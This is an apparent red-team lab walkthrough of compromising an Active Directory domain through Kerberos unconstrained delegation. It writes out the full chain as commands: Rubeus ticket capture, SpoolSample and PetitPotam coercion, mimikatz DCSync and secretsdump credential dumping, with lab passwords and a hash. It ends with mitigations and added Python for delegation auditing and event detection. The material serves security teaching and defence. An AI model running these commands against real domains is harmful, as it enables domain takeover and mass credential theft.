Domain Escalation, Privilege Escalation, Red Teaming

Domain Escalation: Unconstrained Delegation

This research article documents a complete Active Directory domain compromise achieved through the abuse of Kerberos Unconstrained Delegation. Starting with a low-privileged domain user account (raj), the attack chain demonstrates how misconfigured delegation settings on a workstation (MSEDGEWIN10), combined with authentication coercion techniques (MS-RPRN Printer Bug and MS-EFSRPC via PetitPotam), allow an attacker to capture a Ticket-Granting Ticket (TGT) belonging to the Domain Controller computer account (DC$).

Table of Contents

  • Introduction
  • Attack Overview
  • Lab Setup
    • Active Directory Configuration
    • Delegation Settings
  • Attack Chain — Step-by-Step Walkthrough
    • Initial Foothold and Privilege Confirmation
    • Enumerating Unconstrained Delegation
  • Local Attack Method
    • Starting Rubeus TGT Monitoring
    • Triggering Authentication via SpoolSample
    • Capturing the DC$ TGT
    • Pass-the-Ticket (PTT)
    • Performing DCSync (Windows)
  • Remote Attack Method
    • Connecting via Evil-WinRM
    • Running Rubeus Monitor
    • Exploiting MS-EFSRPC (PetitPotam)
    • Capturing TGT Remotely
    • Converting Ticket (Kirbi → ccache)
    • DCSync via Impacket (Linux)
  • Defensive Mitigations
    • Eliminating Unconstrained Delegation
    • Blocking Coercion Techniques
    • Protecting Against TGT Theft
    • Detecting DCSync Activity
    • Network Segmentation

The attack involves five major phases:

  • Reconnaissance — Discovering unconstrained delegation accounts.
  • Initial Access — Connecting to MSEDGEWIN10 via Evil-WinRM.
  • Coerced Authentication — Forcing the DC machine account to authenticate to a controlled host using PetitPotam or SpoolSample.
  • TGT Capture — Intercepting the DC’s Kerberos TGT with Rubeus.
  • DCSync / Credential Dumping — Using the captured ticket to dump all domain credentials.

Lab Setup

  1. Open Active Directory Users and Computers (ADUC).
  2. Navigate to your domain: ignite.local → Computers
  3. Locate the machine: MSEDGEWIN10
  4. Right-click on MSEDGEWIN10
  5. Click on Properties

Configuring Delegation

  1. In the Properties window, go to the Delegation tab.
  2. You’ll see delegation options (important for Kerberos authentication).
  3. Select: Trust this computer for delegation to any service (Kerberos only)

Attack Chain — Step-by-Step Walkthrough

The complete attack is divided into two parallel paths that both converge on the same outcome: extraction of the DC$ TGT followed by domain compromise.

  • Path A uses SpoolSample and Rubeus from the compromised workstation.
  • Path B uses PetitPotam from the Linux attacker machine.

Initial Foothold and Privilege Confirmation

Establishing Local Admin on MSEDGEWIN10

The attacker (operating with some initial elevated context — e.g., from a phishing payload or local exploit) adds the domain user raj to the local Administrators group on MSEDGEWIN10:

net localgroup Administrators "ignite.local\raj" /add
net localgroup Administrators

This gives raj the ability to run tools as a local administrator on MSEDGEWIN10, which is necessary to interact with LSASS and import Kerberos tickets into the current session.

Enumerating Unconstrained Delegation from Kali

The first step is to identify which accounts have unconstrained delegation enabled. The attacker uses Impacket’s findDelegation utility from Kali Linux:

impacket-findDelegation ignite.local/raj:Password@1 -dc-ip 192.168.1.11

The output confirms that both the Domain Controller (DC$) and MSEDGEWIN10$ are configured with Unconstrained Delegation. Since MSEDGEWIN10 is the host where raj has local admin rights, the attack is viable: if DC$ authenticates to MSEDGEWIN10, its TGT will be cached there and can be stolen.

Local Method

Starting Rubeus TGT Monitor

Rubeus is launched in monitoring mode to capture any new TGTs belonging to the dc$ machine account as they arrive in the LSASS cache. The /nowrap flag ensures Base64 ticket output is not broken across lines, making it easier to copy for later use:

.\Rubeus.exe monitor /interval:7 /targetuser:dc$ /nowrap

Rubeus polls every 7 seconds for new TGTs in the LSASS cache matching the target user dc$.

Triggering Authentication via SpoolSample (MS-RPRN)

In a second terminal window (or session) on MSEDGEWIN10, SpoolSample.exe is executed. It tells the Domain Controller (dc.ignite.local) to send an authentication callback to MSEDGEWIN10:

SpoolSample.exe dc.ignite.local MSEDGEWIN10

The DC authenticates to MSEDGEWIN10 over Kerberos, and because MSEDGEWIN10 is configured for Unconstrained Delegation, Windows automatically caches the DC$ account's full TGT in LSASS.

TGT Captured by Rubeus

Within seconds, the Rubeus monitor started earlier detects and displays the newly cached DC$ TGT:

.\Rubeus.exe monitor /interval:7 /targetuser:dc$ /nowrap

The Flags field confirms the ticket is forwarded and forwardable, meaning it carries full delegation rights. This TGT is valid for 10 hours and can be used to perform a DCSync.

Importing the TGT (Pass-the-Ticket)

The captured Base64 ticket is imported into the current Windows session using Rubeus ptt (pass-the-ticket):

Rubeus.exe ptt /ticket:doIE6DCCBOSgAwIBBaEDAgEWooID8j...[base64 blob]

The klist command confirms the ticket is now in the current session's Kerberos cache:

klist

Running DCSync with the DC$ TGT (Windows)

With the DC$ TGT active in the current Kerberos cache, Mimikatz's lsadump::dcsync module is used. Normally, DCSync requires Domain Admin or Domain Controller replication rights. However, because the session is now impersonating DC$, which inherently has replication privileges, this step succeeds:

mimikatz.exe
lsadump::dcsync /domain:ignite.local /user:ignite\administrator

The NTLM hash 32196b56ffe6f45e294117b91a83bf38 for the domain Administrator account is now in the attacker’s possession. This hash can be used in a Pass-the-Hash attack to authenticate as Administrator to any domain-joined system without knowing the plaintext password.

Remote Method

Connecting to MSEDGEWIN10 via Evil-WinRM

Using raj’s credentials and Evil-WinRM, the attacker establishes an authenticated remote shell on MSEDGEWIN10:

evil-winrm -i 192.168.1.10 -u 'ignite.local\raj' -p Password@1

Starting Rubeus TGT Monitor

On MSEDGEWIN10, Rubeus is run in monitor mode to watch for incoming TGTs from the DC machine account:

.\Rubeus.exe monitor /interval:7 /targetuser:dc$ /nowrap

Downloading PetitPotam

Discovered by researcher Gilles Lionel (@topotam77) in 2021, PetitPotam abuses Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC). Several EFS RPC functions — including EfsRpcOpenFileRaw — can be called by unauthenticated or low-privileged users to coerce a target machine into authenticating to an arbitrary host. This makes it a particularly powerful coercion primitive as it does not rely on the Print Spooler service.

wget https://raw.githubusercontent.com/topotam/PetitPotam/refs/heads/main/PetitPotam.py

MS-EFSRPC (PetitPotam)

PetitPotam is executed with raj’s credentials, targeting the Domain Controller (dc.ignite.local) and instructing it to authenticate back to the capture host (msedgewin10.ignite.local, which is running Rubeus in monitor mode):

python PetitPotam.py -u raj -p Password@1 -d ignite.local msedgewin10.ignite.local dc.ignite.local

Both SpoolSample and PetitPotam achieve the same goal: they trick the DC into initiating an outbound Kerberos authentication to MSEDGEWIN10. Because MSEDGEWIN10 has unconstrained delegation, the DC’s TGT is forwarded and cached in LSASS.

Second TGT Captured

Rubeus (running on MSEDGEWIN10 via the Evil-WinRM session) captures the new TGT from the PetitPotam-triggered authentication, identical in structure to the first capture.

Converting the Ticket for Linux Use

On Kali Linux, the Base64 ticket is saved to a file, decoded to binary kirbi format, and then converted to ccache format (which Impacket tools consume):

# Decode the Base64 ticket (saved in ticket.b64) to binary kirbi format
cat ticket.b64 | base64 -d > ticket.kirbi

# Convert to ccache format
impacket-ticketConverter ticket.kirbi ticket.ccache

DCSync from Linux Using the Kerberos ccache

The ccache file is set as the active Kerberos credential store using the KRB5CCNAME environment variable. impacket-secretsdump is then called with -k (use Kerberos) and -no-pass, instructing it to use the cached DC$ TGT for replication authentication:

export KRB5CCNAME=ticket.ccache

impacket-secretsdump -k -no-pass dc.ignite.local -just-dc

Every account in the domain — including Administrator, krbtgt, all users, and computer accounts — has been exfiltrated. The krbtgt hash is the most dangerous: it allows for the creation of Golden Tickets, granting permanent, offline domain access that persists even after password resets (unless krbtgt is reset twice).

Defensive Mitigations

Eliminate Unconstrained Delegation

  • Audit all accounts with unconstrained delegation using PowerShell:

    Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
    Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation

  • Migrate to Constrained Delegation or Resource-Based Constrained Delegation (RBCD) wherever possible.
  • Mark high-privilege accounts (Domain Admins, Enterprise Admins) as “Account is sensitive and cannot be delegated” in ADUC.
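The enumeration step earlier in the article (impacket-findDelegation) and the audit commands in this list both read the same directory attributes: the TRUSTED_FOR_DELEGATION bit of userAccountControl, msDS-AllowedToDelegateTo for constrained delegation, msDS-AllowedToActOnBehalfOfOtherIdentity for RBCD, and the NOT_DELEGATED bit that "Account is sensitive and cannot be delegated" sets. The following is an added example, not code from the article or from Impacket, that classifies accounts from those attributes and produces the findings this checklist asks for. The directory records are constructed to mirror the lab; in practice they would come from an LDAP export or Get-ADObject.

```python
# Added example (not part of the original article): audit delegation settings
# from the same attributes that impacket-findDelegation and
# Get-ADComputer -Filter {TrustedForDelegation -eq $true} evaluate.
# The records below are constructed sample data, not a real directory export.

# userAccountControl flag bits (ADS_USER_FLAG_ENUM)
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Constructed records; attribute names are the real LDAP attribute names
SAMPLE_RECORDS = [
    # server trust account (0x2000) + unconstrained: the default for a DC
    {"sAMAccountName": "DC$", "userAccountControl": 0x82000},
    # workstation trust account (0x1000) + "Trust this computer for delegation to any service"
    {"sAMAccountName": "MSEDGEWIN10$", "userAccountControl": 0x81000},
    # constrained delegation to one SPN
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql01.ignite.local:1433"]},
    # RBCD target (the attribute holds a security descriptor; constructed placeholder bytes)
    {"sAMAccountName": "SQL01$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
    # privileged user without the NOT_DELEGATED protection
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "adminCount": 1},
    # privileged user that is correctly marked sensitive
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200 | UF_NOT_DELEGATED, "adminCount": 1},
    {"sAMAccountName": "raj", "userAccountControl": 0x200},
]


def delegation_type(rec):
    """Classify one account's delegation configuration from its attributes."""
    uac = rec.get("userAccountControl", 0)
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if rec.get("msDS-AllowedToDelegateTo"):
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained-with-protocol-transition"
        return "constrained"
    if rec.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        return "rbcd"
    return "none"


def audit(records, domain_controllers):
    """Return (account, severity, message) findings for the mitigation checklist.

    Domain controllers are unconstrained by design, so they are suppressed;
    any other account with unconstrained delegation is the misconfiguration
    the article abuses."""
    dcs = {d.upper().rstrip("$") for d in domain_controllers}
    findings = []
    for rec in records:
        name = rec["sAMAccountName"]
        uac = rec.get("userAccountControl", 0)
        if delegation_type(rec) == "unconstrained" and name.upper().rstrip("$") not in dcs:
            findings.append((name, "HIGH",
                             "unconstrained delegation on a non-DC account; "
                             "migrate to constrained delegation or RBCD"))
        if rec.get("adminCount") == 1 and not (uac & UF_NOT_DELEGATED):
            findings.append((name, "MEDIUM",
                             "privileged account is not marked "
                             "'Account is sensitive and cannot be delegated'"))
    return findings


if __name__ == "__main__":
    for account, severity, message in audit(SAMPLE_RECORDS, ["DC"]):
        print(f"[{severity}] {account}: {message}")
```

Run against the constructed records, the audit reports MSEDGEWIN10$ as HIGH (exactly the host the attack chain relies on) and Administrator as MEDIUM, while DC$ is suppressed because a domain controller being trusted for delegation is expected. The adminCount check is a coarse proxy for "high-privilege"; group membership in Domain Admins or Enterprise Admins is the more precise test when the data is available.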

Block Coercion Techniques

  • Disable the Print Spooler service on Domain Controllers (blocks SpoolSample/PrinterBug):

    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled

  • Apply Microsoft’s patch for PetitPotam (CVE-2021-36942) and enforce EPA (Extended Protection for Authentication) on ADCS web enrollment endpoints.
  • Block outbound SMB (port 445) and RPC from DCs to workstations via firewall rules.

Protect Against TGT Theft

  • Enable Credential Guard on Windows 10/11 and Server 2016+ to protect LSASS from memory reads.
  • Deploy Protected Users Security Group — members cannot use unconstrained delegation and do not cache credentials in LSASS.
  • Monitor for Event ID 4769 (Kerberos Service Ticket requests) with unusual forwardable flags.

Detect DCSync Activity

  • Event ID 4662 — Log and alert on DS-Replication-Get-Changes-All permission usage.
  • Deploy Endpoint Detection and Response (EDR) solutions that detect lsadump::dcsync patterns.
  • Implement Microsoft Defender for Identity (formerly ATA) which specifically detects DCSync attacks.
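The two log-based items above (Event ID 4769 with forwardable/forwarded flags, and Event ID 4662 showing use of the replication extended rights) can be turned into concrete rules. The following is an added example, not code from the article, that applies both rules to constructed event records. Field names follow the Windows event XML schema (TargetUserName, ServiceName, TicketOptions, SubjectUserName, Properties); the extended-right GUIDs are the well-known values from the AD schema; the ticket-option bit positions are the KDC options as rendered in the 4769 "Ticket Options" field. The event records themselves are constructed to mirror the lab, not captured output.

```python
# Added example (not part of the original article): detection rules for the
# two indicators the mitigation list names, run over constructed events.
#  * 4769 where the service is krbtgt and the FORWARDED option is set: the
#    client obtained a forwarded TGT, i.e. its TGT was delegated to another
#    host, which is exactly what unconstrained delegation makes the DC do here.
#  * 4662 where the accessed property is a replication extended right and the
#    subject is not a domain controller account (DCSync by a non-DC principal).

# Well-known extended-right GUIDs (AD schema), lower-case for matching
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# KDC option bits as they appear in the 4769 "Ticket Options" hex field
OPT_FORWARDABLE = 0x40000000
OPT_FORWARDED = 0x20000000

SAMPLE_EVENTS = [  # constructed records
    # DC$ asks for a service ticket to the workstation: forwardable only, routine
    {"EventID": 4769, "TargetUserName": "DC$@IGNITE.LOCAL", "ServiceName": "MSEDGEWIN10$",
     "TicketOptions": "0x40810000", "IpAddress": "::ffff:192.168.1.11"},
    # DC$ then asks krbtgt for a *forwarded* TGT: this is the TGT being delegated
    {"EventID": 4769, "TargetUserName": "DC$@IGNITE.LOCAL", "ServiceName": "krbtgt",
     "TicketOptions": "0x60810010", "IpAddress": "::ffff:192.168.1.11"},
    # DC-to-DC replication by a DC account: expected, suppressed
    {"EventID": 4662, "SubjectUserName": "DC$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # an ordinary user exercising replication rights: DCSync
    {"EventID": 4662, "SubjectUserName": "raj",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def ticket_options(ev):
    """Parse the hex 'Ticket Options' field of a 4769 event into an int."""
    return int(ev["TicketOptions"], 16)


def forwarded_tgt(ev):
    """Rule 1: 4769 for krbtgt with the FORWARDED bit set."""
    if ev.get("EventID") != 4769 or not ev["ServiceName"].lower().startswith("krbtgt"):
        return None
    if ticket_options(ev) & OPT_FORWARDED:
        return f"{ev['TargetUserName']} obtained a forwarded TGT (request from {ev['IpAddress']})"
    return None


def replication_by_non_dc(ev, dc_accounts):
    """Rule 2: 4662 using a replication right, by a subject that is not a DC."""
    if ev.get("EventID") != 4662:
        return None
    props = ev["Properties"].lower()
    rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
    if not rights or ev["SubjectUserName"].upper() in {d.upper() for d in dc_accounts}:
        return None
    return f"{ev['SubjectUserName']} used {', '.join(rights)}"


def analyse(events, dc_accounts):
    """Apply both rules to every event; return a list of (rule, detail) alerts."""
    alerts = []
    for ev in events:
        for rule, hit in (("tgt-delegated", forwarded_tgt(ev)),
                          ("dcsync", replication_by_non_dc(ev, dc_accounts))):
            if hit:
                alerts.append((rule, hit))
    return alerts


if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_EVENTS, ["DC$"]):
        print(f"[{rule}] {detail}")
```

One caveat the second rule makes visible: when DCSync is performed with the stolen DC$ TGT, as in this article, the 4662 subject is DC$ itself, so the DC-account suppression hides it and the event looks like normal replication. The forwarded-TGT rule is the one that fires on this chain, at the moment the coerced DC obtains a forwarded TGT for a workstation, which is why both signals are needed rather than the DCSync rule alone.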

Network Segmentation

  • Enforce that Domain Controllers cannot initiate outbound connections to workstations.
  • Use Windows Firewall with Advanced Security to restrict RPC/SMB access on DCs.

Conclusion

The Unconstrained Kerberos Delegation attack chain demonstrates how a single misconfiguration — trusting a workstation for unconstrained delegation — can cascade into a full domain compromise. The attacker required only standard domain credentials to begin the chain, and through a combination of coerced authentication and Kerberos ticket theft, obtained the Domain Administrator’s NTLM hash without ever needing to know any privileged password.

The key takeaway for defenders is that unconstrained delegation is a legacy feature that should be eliminated from modern Active Directory environments. Coupling this with robust monitoring for Kerberos anomalies, blocking authentication coercion vectors (Print Spooler, MS-EFSRPC), and deploying Credential Guard significantly reduces the attack surface exposed by this class of vulnerability.

Author: Harshit Rajpal is an InfoSec researcher and left and right-brain thinker.